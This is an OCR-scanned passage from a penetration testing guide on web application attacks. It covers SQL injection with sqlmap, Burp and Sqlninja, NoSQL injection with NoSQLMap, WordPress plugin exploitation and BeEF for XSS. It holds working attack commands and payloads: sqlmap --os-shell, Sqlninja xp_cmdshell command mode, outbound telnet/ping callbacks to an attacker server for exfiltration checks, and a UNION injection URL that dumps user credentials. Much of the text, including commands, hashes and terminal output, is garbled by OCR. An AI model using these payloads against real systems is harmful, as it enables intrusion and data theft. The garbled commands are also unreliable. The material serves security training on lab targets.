POST /webgoat .net/Content /SQLInjection. aspx HTTP/1.1 Do an active scan 
Host: 172.16.151.144 Do a passive scan 
User-Agent: Moszilla/5.0 (X11; Linux 1686; rw:31.0) Сеско/20100101 F| cong to intruder 
Accept: text/html,appiícation/xhtml*xml,application/xml;q*-0.59,*/*;q)| 

Accept-Language: en-US,en;q*"0.5 Send to Repeater 
Accept-Encoding: gzip, deflate Send to Sequencer 
Referer: http: //172. 16. 151. 144/webgoat net /Content/SQLInjection.asp| Send to Comparer 
Cookie: ASP. WET_SessionId=3BDCIBBSEESFBSSS7SEBEBCC; Serversb3dhe3Bi| Send to Decoder 
Commection: keep-alive 

Content-Type: application/x-www-torm-urlencoded 
Content-Length: 1360 






Show response in browser 
Request in browser 


Send to SQLMapper 


LL VIBWSTATESDAvNEAIAAA4BBQACAQOQAgAADgEFAQ4ABDRACAAAOAQUTDgENEAIAAA4| Send to CeWLer OQAhAMDAODAQI 
TS1bnQPFAQELXyFJdOVcQ79 1bnQFAVAAAAAAAAAAAAAAEAMPAVEJRCFOYUZpZWxIAG EE ET рььацьхнуьз1+% 
AuMCvgQ3VsdHVyZTluZXVOcmFsLCBQdWJsAWNLZX1Ub7tr1b)l1iNzdhNWMIN)ESMzPlN] gcAGQgAAgk AA 
AGQGAAgk AAgSAAA ABB QAOAQOGAGAADGIEAQUCE GMO AvOQAGAAD gif F AAUBBQI CAwQ. EIVGhvbXBzb- 
dGhvbXdizb2 SAd2Vi229hdGHvaWSzLal vb QAAAAANEATAAA4DBGAFAQUCDgMNEKAIMDvE| Scan for WSOL Files EFVMNI1bmcAAAA 
mdAd2Vi22ShdGMwvaWSzLullvb QAAAAANRATAAA4DBQAFAQUCDGMNRATMDvECAAABA Engagement tools > |CDAGBAgAAARZC 





Burp - SQLiPy Scan 


For the first time, we will have to input the SQLMap API IP and Port. We can also select what type 
of data we want to pull. 





Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts 

















172.16.151.128| SQLMap АР! Port: 8083 














SQLMap API IP: 

URL: http://172.16.151.144:80/webgoat net/Content/SOLinjection. aspx 

Post Data: Yi5VSSS5XZW)Db250cmS9scySTb3JORGIyZWNOaWSuTVNSc3RIbSSXZWIsIFZIcnNpb24SMiáwL а 
JAUMCwgO3VsdHVyZTlUZXVOcmFsLCBOQdW)saWNLZXIUb 2tlbjLiIMDNmMNWY3SZjExZOUWYTN 
hBQAaGQgAABADAAAAABACAAAAS. сїї0й0% 24BodyC ontentPlaceholder% 24txtName »t&. ctio 
0% 24BodyContentPlaceholder*24btnAdde Find Employee& | EVENTVALIDATION« GwABA 
AAAH 2P% 2P36 2PS 2P% 2FWEAAAAAAAAADWEAAAAEAAAACAZ FCOeLh7q7fJ1 DDSRg5vYLAA*e 3 
D0*$30& EVENTTARGETe&  EVENTARGUMENT« т 

Cookies: ASP.NET Sessionid« 38BDC38896E8FB55978EB6BCC; Server=b3dhc3Bid2E= 

Referer http://172.16.151.144/webgoat. net/Content/SQLinjection. aspx 

User-Agent Mozilla/S.0 (X11; Linux 1686; гу:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0 

Test Parameterís) О Text Only 


Level: 3 wj Risk 1 w) 


O Param Pollution O Current User @ Current 08 @ Hostname LJ Is ОВА? 





@ List Users @ Ust Passwords O List Privs O List Roles @ ust DBs 


Burp - SQLMap Scanner Injection 


If an SQL Injection is successful, the Scanner tab will light up and have a new finding called 
"SOLMap Scan Finding.” By clicking on this, we will be able to get information about the current 


DB, Hostname, Users, Passwords and databases. 


Burp Intruder Repeater Window Help 








Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extende 


Results | Scan queue | Live scanning | Options 





i Email addresses disclosed 
Path-relative style sheet import 


| Advisory [ Request | Response 


-— gwaw ve rv 





Password Hashes per User: 

e wackopicko 

€ "SFASFAC9ACD2CASCIEBSEOEC801 75D5FCAA0D7D6 
e root 

€ *73316569DAC7839C2A784FF263F5COABBC7086E2 
e kbloom 

€ *10^99DBC0772291AA6AF9A1A9271945340E4E812 
e stealth 

€ *OF44FAl 4B9DFBBFFBDF2F7692868DE18997C66ED 
@ sendmail 

€ *47A91042510E7E966EF4075A934A77A57A9E71FE 
е webcal 

€ *E2E1F0A3459647AACF63319694BCBD107231B10C 
ә citizens 

€ *E0E85D302€E82538A1FDA46B453F687F3964A99B4 
e yazd10 

€ *30B462BE16C04867D06113304F664BB9A5B573D8 
е sqlol 

€ *1DB6D61428C07B8E8D6876CC60ECADO1D2CE844A 

SQLMap Results 


As you can see above, we didn't need to remember any switches or parameters, but we were still 
able to dump the database. This makes SQL injections much quicker and leverages an easy-to-use 
GUI panel. 


Manual SQL Injection 


SOLmap (http://sqlmap.org/) (Kali Linux) 


The command line version has all the same functionality as through Burp. In the following examples, I 
will show both a GET parameter and a POST parameter example with SQLmap, since they are the 
most commonly identified types of SOLi. The reason I show both HTTP method attacks is because if 
you don't have the request properly configured, it is very likely the attack will fail. 


Here is a look at the help file for SQLmap. There are a lot of different switches that can be used for 


SQLi attacks: sqlmap -h. 





SQLMap Help Information 


GET Parameter Example 

In the following examples, we are going to assume that the GET parameter is where the SQLi 
vulnerability is located with the URL. We want to test every parameter and make sure that the SQLi 
vulnerability is really a finding. There are a good number of false positives I have seen with scanner 
tools, so validation is really the only method for ensuring the findings. Remember that if you do not 
specify a value to test, SQLmap will test every parameter by default. 


e Here is an example command to identify if an SQL injection vulnerability using the 
banner switch: 

ө cd /opt/sqlmap 

e python ./sqlmap.py -u "http://site.com/info.php?user=test&pass=test" -b 


For example, we will attack our vulnerable virtual machine (OWASPBWA): 
e python ./sqlmap.py -u  "http:///192.168.1.124/mutillidae/index.php?page-user- 
info.php&username-asdf&password-sdf&user-info-php-submit- 
button=View+Account+t Details" —b 


MySQL UNION query (NULL) - 5 columns 
yage=user-info.php&username=asdf' UNION ALL SELECT NUL 
hp-submit-button-View Account Details 


ix Ubuntu 10.04 (Lucid Lynx) 
3.2, Apache 2.2.14 


em: Linux Ubuntu 


[*] shutting down at 18:28:41 





Retrieving the database username: 
e python ./sqlmap.py -u "http://site.com/info.php?user=test&pass=test" --current-user 
Interactive Shell 
e python ./sqlmap.py -u "http://site.com/info.php?user-test&pass-test" --os-shell 
Some hints and tricks: 
e You might need to define which type of database to attack. If you think an injection 
is possible, but SQLmap is not finding the issue, try to set the --dbms=[database type] 
flag. 
e If you need to test an authenticated SQL injection finding, log into the website via a 
browser and grab the Cookie (you can grab it straight from Burp Suite). Then, define 
the cookie using the --cookie=[COOKIE] switch. 
e Stuck? Try the command: sqlmap --wizard. 


POST Parameter Example 

POST examples are going to mimic GET injections, except for how the vulnerable parameter is 
passed. Instead of being in the URL, the POST parameters are passed in the data section. This 1s 
normally seen with username and passwords since the web servers generally log GET parameters 
and you wouldn't want the web server to log passwords. Also, there are size limitations with GET 
methods and, therefore, a lot of data will be passed via POST parameters for larger applications. 


Determining if an SQL inject is valid (the result will be the banner if valid): 
e python ./sqlmap.py -u "http://site.com/info.php " --data= "user=test&pass=test" -b 


For example, we will attack our vulnerable virtual machine (OWASPBWA): 
e python ./sqlmap.py -u "“http://192.168.1.124/mutillidae/index.php?page=user- 
info.php&username-asdf&password-asdf&user-info-php-submit- 
button- View--Account-Details" -b 


5 columns 
CT NULL,NULL,NULL,CO 
,NULL#&pass sicut ads f&login- php -submit -button=Logi 


:51:27] [INFO] the back-end DBMS is MySQL 


pic б Ж : 
a : Linux Ubuntu 
iback-end DBMS 


banner: А -3ubuntul2 .6 Log' 


[*] shutting down at 18:51:27 


:/opt/sqlmap# python 
mutillidae/index.php?page=lo х 
=ads f&Login-php -submit -button=Login" 


SQLMap Banner 





Retrieving the database username: 


e python ./sqlmap.py -u "http://site.com/info.php --data= "user=test&pass=test" -- 
current-user 


Interactive Shell: 


e python ./sqlmap.py u "http://site.com/info.php --data= "user=test&pass=test" --os- 
shell 


If you are able to gain access to an os-shell, you will have full command line access as the database 
user. In the following example, I was able to find a vulnerable SQLi, gain an os-shell, and run an 
ipconfig command. 


shel ir nfig 
do you want to retrieve the command standard output? [Y/n/a] 





SQLMap Command Shell 


I recommend spending some time getting used to running different SQLi commands and trying 
different switches identified in the help file. If SQLmap fails, it might be your configuration, so make 
sure you try using the Wizard setup, also. 


Sglninja 
(http://sqlninja.sourceforge.net/) (Kali Linux) 


Sqlninja is another great SQL injection tool for uploading shells and evading network IDS systems 
against MSSQL databases. You might be asking: Why would I use SqIninja if I have already become 
comfortable with SQLmap? From many years of experience, I have seen a large number of tests that 
identify SQLi with only one tool or the other. This might be due to a number of factors such as how it 
detects blind SQLi, how they upload binaries, how IPS signatures might detect one tool or the other, 
or how they handle cookies. There are so many different variables, and it would be smart to always 
double-check your work. 


Taking a look at the help file with the -h switch, we can see all the different functionality Sqlninja 
has: 





Sqininja Help Page 


The only issue I have had with SqIninja is that the configuration file is a bit more difficult to set up 
and I have never found great or easy-to-read documentation. So I will give two similar examples 
from SQLmap. 


In Sqlninja, you need to define the vulnerable variable to inject by using the _ SQL2INJECT — 
command. This is different from SQLmap, where we did not need to specify which field to test 
against. Let's go through a couple of examples since it should make things much clearer. Before we 
can use Sqlninja, we need to define the SQL configuration file. This will contain all the information 
about the URL, the type of HTTP method, session cookies, and browser agents. 


Let me show you the easiest way to obtain the information required for Sglninja. As before, load up 
the Burp Suite and turn the proxy intercept on the request where the vulnerable field is passed. In the 
following example, we are going to capture requests sent to /wfLogin.aspx and identify the POST 
parameter values. This is going to have most of the information required for Sqlninja injections, but 
slight modifications will need to be made from the Burp Raw request. 


Let's take a look at one of the requests from Burp that identified a potential SQLi vulnerability: 


Request 


Raw | Params | Headers | Hex | ViewState 
POST /wiLogin.aspx HTTP/1.1 








Host: site.com 

User-Agent: Moz illa/S.0 11; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 
Accept: text/html, ind ati on/ xhtml + mal application/xml;qe0.9,*/*;qe0.8 

Accept- ~Language: өр, еп; T 7 „іё; po. 3 

Accept - агае 18 859- #-86;д=0.7,*;д=0. 

Referer: htt Карнаи ит aspx 


Cookie: ASP. NET. SessionIde3owsdevpwyrbjv45hltc4i45 
Connection: keep-alive 

Content-Type: application/x-www-form-urlencoded 
Cookie: ASPSESSIONID=3dkDjb3 jasfwefJGd 
Content-Length: 367 


Loginpanel 183AtxtUserNamewadminéLoginpanel 1$3AtxtPasswordeadmin&Loginpanel 143Abt 
nLogin=Login 


Burp Request Example 


In the next two examples, you will see how the most common GET and POST parameters are created. 
This can be used for any different type of HTTP method, but usually the POST and GET methods will 
be used. 


A few things to notice from the original Burp request versus how it will be entered in the Sqlninja 
configuration file are: 
e The HTTP Method (GET/POST) needs to be modified to include the full URL. Burp 
is missing the http://site.com in front of /wfLogin.aspx 
e You have to define which parameters to fuzz by adding the SQL2INJECT__ 
string. 
e Sometimes for Sglninja, you may need to try the attack by first closing the 
vulnerable SQL parameter. This can be done with ticks, quotes, or semi-colons. 


GET Parameter Example 
We are going to write the sql get.conf configuration file to our Kali desktop with two vulnerable 
parameters. Sqlninja will try to attack both the user and pass fields and try to validate if they are 


vulnerable. To create/modify the configuration file in a terminal, type: 
e gedit ~/Desktop/sql_get.conf 
e Enter the following into the configuration file and save it: 
e --httprequest_start-- 
GET http://site.com/wfLogin.aspx? 
user=test’; SQL2INJECT  &pass-test; SQL2INJECT — HTTP/1.0 
Host: site.com 
User-Agent: Mozilla/5.0 (X11; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 
Accept: text/xml, application/xml, text/html; q=0.9, text/plain; q=0.8, image/png, */* 
Accept-Language: en-us, en; q=0.7, it;q=0.3 
Accept-Charset: ISO-8859-15, utf-8; q=0.7,*;q=0.7 
Content-Type: application/x-www-form-urlencoded 
Cookie: ASPSESSIONID-3dkDjb3jasfwetJGd 
Connection: close 
--httprequest_end-- 


POST Parameter Example 
A POST request differs from a GET in that the parameters are passed in the data section instead of 
being part of the URL. In a terminal, we need to create the configuration file and modify the 
parameters to inject into. In this example, we will inject into both the username and password: 
ө gedit ~/Desktop/sql_post.conf 
e Enter the following into the configuration file and save it: 
e --httprequest_start-- 
POST http://site.com/wflogin.aspx HTTP/1.0 
Host: site.com 
User-Agent: Mozilla/5.0 (X11; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 
Accept: text/xml, application/xml, text/html; q=0.9, text/plain; q=0.8, image/png, */* 
Accept-Language: en-us, en; q=0.7, 1t;q=0.3 
Accept-Charset: ISO-8859-15, utf-8; q=0.7,*;q=0.7 
Content-Type: application/x-www-form-urlencoded 
Cookie: ASPSESSIONID-3dkDjb3jasfwefJGd 
Connection: close 
username=test'; SQL2INJECT  &password-test'; SQL2INJECT 
--httprequest_end-- 


Executing Sqininja 
Whether you use a GET or POST method attack, executing your attack will be the same. Now that we 
have created a configuration file, we can use the following command to run SqIninja: 

e sglninja -mt -f ~/Desktop/sql_get.conf 


The following command says to run Sqlninja using the test mode to see if ће injection works with the 
configuration file we just created. If you are lucky and do find a valid SQL injection, you can start to 
attack the database. In the following example, we are going to exploit our database, find the version, 
check to see if we are the "sa" account (who has administrative privileges), and see if we have 


access to a shell. 


root@kali:/usr/bin# sqlninja -f sqlninja.conf -m f 
Sqlninja rel. 0.2.6-rl 
Copyright (C) 2006-2011 icesurfer <rQ0t@northernfo 
[+] Parsing sqlninja.conf... 
[+] Target is: 30 
What do you want to discover ? 
© - Database version (2000/2005/2008) 
- Database user 
Database user rights 
whether xp cmdshell is working 
Whether mixed or Windows-only authentication 
Whether SQL Server runs as System 
(xp cmdshell must be available) 
- Current database name 
ALL of the above 
Print this menu 
exit 


in & WW) h2 e 


> 0 

[+] Checking SQL Server version... 
Target: Microsoft SQL Server 2000 

> ] 

Checking whether we are sysadmin... 

seem to be ‘sa :) 


] Finding Current DB length... 
Got it ! Length = O 

[r] Now going for the characters....... І 
Current DB is....: 

> 3 

[+] Checking whether xp cmdshell is available 
xp cmdshell seems to be available :) 





Sqlninja Example 


Once we have xp_cmdshell available, we want to test that we have command line access and what 
types of privileges we have. In the example below we are exploiting the SQLi vulnerability and 
testing command line commands. 


During this specific test (image below), it looks like we might be running commands on the server, 
but we would need to validate this. The issue though, is that after setting up a listener on a server we 
own on the Internet, it doesn't look like we are seeing any connections from the compromised server 
outbound. This could be a problem if we wanted to exfiltrate data back to us or download additional 
malware. Since the command line console created by Sqlninja doesn't show the responses from 
commands, therefore, we need to validate that our commands are successfully executing. 


The best way to check if a command is working is by putting tcpdump to listen for pings on a server 
we own, which is publicly available on the Internet. By running ping commands on a compromised 
server, we can easily validate if our server is responding to pings. The reason we use pings is 
because ICMP is generally allowed outbound and is less likely to trigger IDS/IPS signatures. This 
can be configured with the following command on an external server owned by the attacker: 

e tcpdump -nnvXSs 0 -c2 icmp 


This command will log any pings sent to my server, which will allow me to validate that the server 
can talk outbound and that my commands are working. On my compromised SQLi host, I execute a 
simple ping back to my server. If it is successful, tcpdump will see the ICMP request. 


Command line SQLi attacks can be run with the following command: 
e sqlninja -f [configuration file] -mc 


As we can see in the image below, I first tried to run telnet commands back to my server, but that was 
unsuccessful. I then tried to initiate ping commands back to my server, where tcpdump was listening. 
In this case, my attack was successful, which proved I could run full commands on this host, but it 
does not have web access back out. 


In the image below, the top portion is my server logging pings and the bottom image is the victim host, 
which is vulnerable to SQLi. Although the telnet commands seem to fail, the pings are successful. 


$ sudo tcpdump. -nnvXSs 8 -c2 icmp 
tcpdump: listening on ethë, link-type ЕМ1@МВ (Ethernet), capture size 65535 bytes 
84:47:52.375098 T (tos 8x8, ttl 113, id 3938, offset 8, flags [none], proto ICMP (1), length 68 
38: ICMP echo request, id 512, seq 9685, — 48 
Ё@х@@@й: imi B883c @{5а ppa 7101 PUOL айбе За16 Booted sq. жазава 
@х@ё10: 607e 72bc 0800 2701 0208 2370 6162 6364 “~r...'...#}abed 
8x8020: 6566 6768 696a БЬбс 5d6e 6f78 7172 7374 = efghijklmnopqrst 
8x8030: 7576 7761 6263 6455 6667 6869 uvwabcdefghi 
84:47:52.375175 IP (tos üxü, ttl 64, id 4393, offset ð, flags [none], proto ICMP (1), length 66) 
BB > ': ICMP echo reply, id 512, seq 9885, length 40 
8x6800: 4500 @@3с 1129 0008 4001 af39 607e 72bc E..«.]..8..9' ^r. 
@х@@1@: айбе 3a16 0000 2fdf 0200 237d 6162 6364 ..:.../...#}abed 
8x8020: 6566 6768 696a Gb&c Edhe 6f78 7172 7374 efghijklmnopqrst 
68x6038: 7576 7761 6263 6465 6667 6869 uvwabcdefghi 
2 packets captured 


2 packets received by filter Att 
8 packets dropped by kernel ac er 





[+] Parsing sql.conf... 

[+] Loading extraction module: lib/getdata time.pl 

[+] Port 80. Assuming cleartext 

[+] Target is: 

[*] Starting blind command mode. Use "exit" to be dropped back to your shell. 
telnet internet-scan.com:999 

[*] Command has been sent and executed 

* telnet internet-scan.com 999 


[+] Command has been sent and executed | - = 
ping internet-scan.com | | C | m 
[+] Command has been sent and executed „ЁЁ 


SQLMap Command Injection Ping 





If you have gotten this far and you aren't sure what to do next, you can jump to the Lateral Pass 
section to get an idea on next steps. This should give you enough details to help you start testing and 
practicing on vulnerable frameworks. Of course, these are the best scenario options, where the SQLi 
works without having to configure detailed settings about the database type, blind SQLi type, or other 
timing type issues. 


NoSQL Database Injections 


More and more, I am coming across NoSQL type databases on my penetration tests. If you aren’t 
familiar with NoSQL, try to build out a database and interact with it. The major difference between 
the two types of databases is that in a regular SQL database, it is structured and relational, while ina 
NoSQL database, it is based more on key/value pairs, allowing you to store any type of data. This is 
a very high explanation and takes a little time to understand why NoSQL databases are more 
beneficial compared to traditional relational databases. 


The two common types of NoSQL databases I come across are CouchDB and MongoDB. There has 
always been a consensus that SQL injections do not work on NoSQL databases. This isn’t completely 
true. While many of the normal SQL injection attacks do not work in its current fashion, it is still 
possible to accomplish many of the same goals. This is best demonstrated through the following 
example. In the next lab example, we will build a MongoDB server and vulnerable application. 


LAB: 
e git clone https://github.com/tcstool/NoSQLMap. git /opt/NoSQLMap 
e git clone https://github.com/cheetz/NoSQL Test.git /opt/NoSQL Test 
e apt-get install php5-dev php-pear 
e pear install -f pecl/mongo 
e pecl install mongo 
e pecl install apc 
e gedit /etc/php5/apache2/php.ini 
o add the following to the phi.ini file: 
© extension-mongo.so 
e service apache2 start 
e gedit /etc/mongodb.conf 
o Edit bind port to listen on any interface 
o bind ip = 0.0.0.0 
e mkdir /var/www/vuln apps 
e mv /opt/NoSQL Test/userdata.php /var/www/vuln apps 
e service apache2 restart && service mongodb restart 


Next, we need to populate the MongoDB database. In a terminal window type: 
e mongo 

o use appUserData 

о db.createCollection("users") 

o show collections 

о db.users.insert( {"name":"james","username":"james","email":"james: 
о db.users.insert( {"name":"frank","username":"frank","email":"frank@; 
о db.users.insert( {"name":"paul","username":"paul","email":"paul@su 


If everything worked out, it should look like this when you query a user: 


User Profile Lookup x \ F 


© 192.168.199.128 v Biv 
fi Most VisitedY Bb Offensive Security ч Kali Linux "& Kali Docs KBExptoit-DE 


function () { var query = 'paul'; return this.username == query;} 
1 user found. 

Name: paul 

Username: paul 

Email: paul@suck.testlab 


Enter your username: 





Search |paut Submit 


Sample Vulnerable NoSQL Application 


If you see this, that's great! You have a MongoDB installation and webpage utilizing that backend 
NoSQL database. Now, we want to see if we can attack this MongoDB installation. In the following 
example, we are going to use a tool called NoSQLMap. 


root@kali: /opt/NoSQLMap 


File Edit View Search Terminal Help 


25 


nosqLmap@gmail .com 


1-Set options 

2-NoSQL DB Access Attacks 

|3-NoSQL Web App attacks 

4-Scan for Anonymous MongoDB Access 
5-Change Platform (Current: MongoDB) 
x-Exit 

Select an option: J 





NoSQLMap 


We need to execute the nosqlmap.py script and set the vulnerable IP and GET parameters. 


Attacking MongoDB: 
e cd /opt/NoSQLMap 


e python nosqlmap.py 
e ] - Set Options 
o Set options for target host IP (your Mongo IP) 


о Set App Path to: /vuln_apps/userdata.php? 
usersearch=paul &submitbutton=Submit 


о set my local MonboDB IP (your host) 
o b - Save option file 
ох - to Exit 


We have now set the configuration of the vulnerable site, so let’s attack the web application that uses 
a MongoDB backend: 


e 3-NoSQL Web App attacks 

e Baseline test-Enter random string size: 5 
e ]-Alphanumeric 

e ]-usersearch 


NoSQLMap is taking each variable in the GET parameter and testing common NoSQL injection 
techniques. If everything is successful, you will see something like the following: 


root@kali: /opt/NoSQLMap 


Search Terminal Help 


Test 8: PHP/ExpressJS > Undefined Injection 

[Injection failed. 

IStart timing based tests (y/n)? y 

{Starting Javascript string escape time based injection... 

IHTTP load time variance was 30.0 seconds! Injection possible. 
IStarting Javascript integer escape time based injection... 

IHTTP load time variance was only 0.0 seconds. Injection probab 
[MongoDB < 2.4 detected. Start brute forcing database info (y/n) 


Vunerable URLs: 

http: //192.168.199.128:80/vuln apps/userdata.php?usersearchza' ; 

| return db.a.find(); var dummy='!&submitbutton=Submit 

http://192.168.199.128:80/vuln apps/userdata.php?usersearch-a' ; 
return this.a !-'WC4Uo'; var dummy='!&submitbutton=Submit 


[Possibly vulnerable URLs: 

[http://192.168.199.128:80/vuln apps/userdata.php?usefseagch=l ; 
); var dummy-l&submitbutton-Submit 
http://192.168.199.128:80/vuln_apps/userdata.php ?use fseareh=a\; 
[0пе() ; var dummy-' !&submitbutton=Submit 
Ihttp://192.168.199.128:80/vuln apps/userdata.php?usersearch=L; 
Ine(); var dummy-l&submitbutton-Submit 
http://192.168.199.128:80/vuln apps/userdata.php?usersearchz1; 
C4Uo; var dummy-l&submitbutton-Submit 


[Timing based attacks: 
[String attack -Successful 
Integer attack -Unsuccessful 


Mave results to file /n)? v 
NoSQLMap - Scanner Results 


Right away, NoSQLMap identified two URLs that are vulnerable. Browsing those URLs, we see that 
the variable usersearch is vulnerable and that we can inject NoSQL commands into that GET 





parameter. 


ө http://192.168.199.128:80/vuln_apps/userdata.php?usersearch=a'; return 
db.a.find(); var dummy='!&submitbutton=Submit 


Running that query in a browser, we see something that is equivalent to a select * from usersearch; in 
SQL. 


o t v с > Goog Q| » 
É3 Most VisitedY Bid Offensive Security Ҹ Kali Linux "A Kali Docs ERExploit-DB 
function () { var query = 'a* return db.a.find(); var dummyz'!; return 
this.username == query;} 


3 user found. 

Name: james 

Username: james 

Email: jJames@suck.testlab 


Name: frank 
Username: frank 
Email: frank@suck.testlab 


Name: paul 
Username: paul 
Email: paul@suck.testlab 


Enter your username: 





Search Submit 


NoSQL Injection 


We have just dumped that Collection and dumped all the users. Although many people have stated that 
traditional SQL injection attacks do not work on noSQL databases, this is only partly true. The 
concept for SQL injection attacks against NoSQL technologies is still sound, regardless of database 
syntax. 


CMS - Content Management Systems 
To continue on the topic of vulnerable web applications, I am always finding different types of 


content management systems (CMS) through my penetration tests. From what I have seen, Nessus will 
pick up some of the CMS issues, but most are found through more manual testing. To help speed up 
the initial scans of CMS sites, I like to use a couple of tools, listed below. 


CMSmap Lab 

(https://github.com/Dionach/CMSmap)(Kali Linux): 

CMSmap is a vulnerability scanner written by Dionach and automates and validates issues in 
numerous CMS applications. Let’s walk through an example from initial finding to exploitation. On 
our OWASPBWA VM, there is a WordPress site on which we can test the scanner: http://[ Vulnerable 
OWASPBWA IP]/wordpress/. 


91 72.16.151.144/wordpress, “сө By 


t Visitedv [Offensive Security Kali Linux “Ка Docs KllExptoit-DB Wà Aircrack-ng 


Broken WordPress 





New Plug-ins m 


Apri 16th, 2011 


We have just enabled the WordPress Plugin Spreadsheet v0.6 as well 
as MyGallery 1.2.1. Content should be up in a few days for that! 


Pages 
Posted in Uncategorized | No Comments » — 
Archives 
» April 2 


This is a title » берет 
Vulnerable Wordpress Site 


CMS sites have historically had huge numbers of vulnerabilities, so let’s scan this site using 
CMSmap to see what we can find: 

ө cd /opt/CMSmap 

e ./cmsmap.py -t http://[ Vulnerable OWASPBWA IP]/wordpress/ 


4 root@kali: /opt/CMSmap 


File Edit View Search Terminal Help 


:/opt/ChSmap# . 
о & Тїте: 19/0 
get: http: 
Website Not in H 


2-lubuntu4.5 wit 
6.5 mod sS1/2:2..14 Op 
10.1 


Title: Wordpress Download Mana 


T Title: Wordpress wpDatalables 
09-11-16 Ver es Title: WordPress 2.6 - 2.7.1 а 


Configuratdem Seeurity«Bypass-Vulnenabiity 


iey ў YeS Title} WordPregs.= 21213 


fied: Yes Title: WP-DB Backup For Wordpr 
Vulnerabi bity 


3: Wordpress Plugin Spread 


ig for Dire 
172.16.15 





:/opt jí HSmap£ i 
CMSMap - Scanner Results 


A lot of different findings will come up and it is really just about playing around with them to find the 
right ones to exploit. In this case, we will take one of the verified vulnerabilities: 
e [M] EDB-ID: 5486 Date: 2008-04-22 Verified: Yes Title: Wordpress Plugin 
Spreadsheet <= 0.6 - SQL Injection Vulnerability 


A quick Google search of EDB-ID: 5486 points to: 
e http://www.exploit-db.com/exploits/5486/ 
e And the exploit code looks like this: wp-content/plugins/wpSS/ss load.php? 
55 14=1+апа+ 
(1=0)+uniontselect+1,concat(user_login,Ox3a,user_pass,0x3a,user_email),3,4+from 
-&display=plain 


So this looks to be an SQL injection vulnerability that queries the database for the users, passwords, 
and emails. Let's open a browser to this page: 


ө http://172.16.151.144/wordpress/wp-content/plugins/wpSS/ss_load.php? 
55 14=1+апа+%%28 1=0%29+uniontselect+1,concat%28user_login,0x3a,user_pass,0x3 
-&display=plain, we see the hash of the admin account. 


È Meet the FoxyProxy ... X | @ Broken WordPress X | @ WordPress Spreadsh,.. X P 
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admin:21232f297357a5a743894a0e43801fc3: admin@example.org 


WordPress Exploit 


Great—we just got the hash to the admin account, which we can crack and, if successful, connect back 
to the database or SSH into the server. 


For more in depth "WordPress vulnerability scanning, look at also using WPScan 
(https://github.com/wpscanteam/wpscan): 

ө cd /opt/wpscan 

e ruby ./wpscan.rb --url http://[ WordPress IP]/ 


WPScan is not only a vulnerability scanner for WordPress, but also has functionality for brute-forcing 
accounts, enumerating plugins, enumerating users, and other discovery tools. 


Cross-Site Scripting (XSS) 


I can't talk about web application vulnerabilities without talking about Cross-Site Scripting (XSS). 
This is probably one of the most common vulnerabilities that I come across. XSS is a user attack that 
is caused by a lack of input validation by the application. There are two types of XSS: reflective 
(non-persistent) and stored (persistent). Both allow an attacker to write script code into a user's 
browsers. I am going to focus on reflective XSS, which is the more common type and is relatively 
similar to stored XSS in terms of vulnerability exploitation. 


BeEF Exploitation Framework 
(http://beefproject.com/)(Kali Linux) 


The general question I get from my clients is, "How much harm can an XSS really cause?" With this 
vulnerability you have the full ability to write scripting code on the end user's browser, so anything 
that you do in JavaScript could be used against the victim. In this section, we will dive into how 
malicious you can be with an XSS attack. 


The best tool I have seen used with XSS attacks is the BeEF Exploitation Framework. If you find an 
XSS, not only can you cause a victim to become part of your pseudo-botnet, but you can also steal the 
contents of the copy memory, redirect them to links, turn on their camera, and so much more. 


If you do find a valid XSS on a site, you will need to craft your XSS findings to utilize the BeEF 
Framework. For our XSS examples in this chapter, we are going to use an XSS that was identified 
from our initial Burp Active Scans. Let's take the example vulnerable URL: 
http://www.securepla.net/xss_example/example.php?alert=test'<script>[1frame]</script>. 

From the Setting Up a Penetration Box section, we installed BeEF into /opt/beef/. 


We are going to have to first start the BeEF service. 


Starting BeEF Commands: 
e cd /opt/beef/ 
e /beef 


File Edit View Search Terminal Help 
Bind socket [ima doral] listening on [0.0.0.0:2000]. 
Brov n Framework (BeEF) 0.4.6.0-alpha 


ittp://be 
http://blc 
https: 





Starting Up BeEF 


Let's log into the console UI after the BeEF server has started. As we see from the image above, the 
UI URL in this case is located at http://127.0.0.1:3000/ui/authentication. We can open a browser and 
go to that URL. 


| Г) BeEF Authentication | [^ 


Ф % [à 127.0.0.1:3000/ui/authentication 
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Authentication 








Username: 





Password: 


| Login 





BeEF Login Screen 


If everything started up successfully, you will be able to log into the UI using the username “beef” and 
password “beef”. If we look at the image where we loaded BeEF via the command line, we see a 
URL for both the UI page and the hook page (Hook URL). Let's take a moment to review the hook 
page (hook.js). 


€ @127.00.1 vc + 


fx Most Visitedv [offensive Security Ñ Kali Linux "Kati Docs MBExploit-DB WAircrack-ng 


/*! jQuery v1.10.2 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license 
//& sourceMappingURLsjquery-1.10.2.nin.map 
*/ 


(function(e,t)(var n,r,ietypeof +, о•е, location, a»e.document,s#a.docunentElement, lee. jQuery, use. $, 
OQ. pz[], f2"1.10. 2", dzp.concat,hzp push, g»p. slice, mep.indexOf, y=c. toString, v=c. hasOwnProperty, b=f. 
x. fn.init(e, t.r)},w=/[+-] ?(?:Nd* V. | | Nd (?: [eE] [+-] ?\d+| )/. source, T=/\S+/g, C=/* [NSNuFEFFVxA0] +] 1\5 
(s[NvW] +>) [^] * | &C [Nw 1*)) $7, ke/^ «(Nw )NS*N/?2 (2: <\/\1>| )$/,Е=»/^ IN], : Qs] *$7, Se/ (?:^| 1|], ) C?:Ns* 
["\\\/bfnet] Jul \da-fA-F] (43/9, ј=/" [^ NN rn] ** | true] false| null] -2(?: \d+\. [) Nd (2: [eE] [+-] 2\d+1)/ 
2])/gi.Hefunction(e,t)(return t. toUpperCase()},q=function(e){(a.addEventListener| | "1оай" ===е , type 
(_(),x. ready ())},_=function(){a.addEventListener? 
(8.removeEventListener("DOMContentLoaded" , q, !1), e. renoveEventListener("load",q, !1)): 
(a.detachEvent ("onreadystatechange", q), e. detachEvent (*onload",q)));x.fnex.prototypes 

(query: f,constructor:x, init:function(e,n,r)(var i,o;if(!e)return this;if("*string"sstypeof e)(if( 
€" zzze  charAt (0) 55" »" ===е, charAt (e. length-1)&&e. length»-3?[null,e,null]:N.exec(e), !i] |' 3l1] &&n) re 
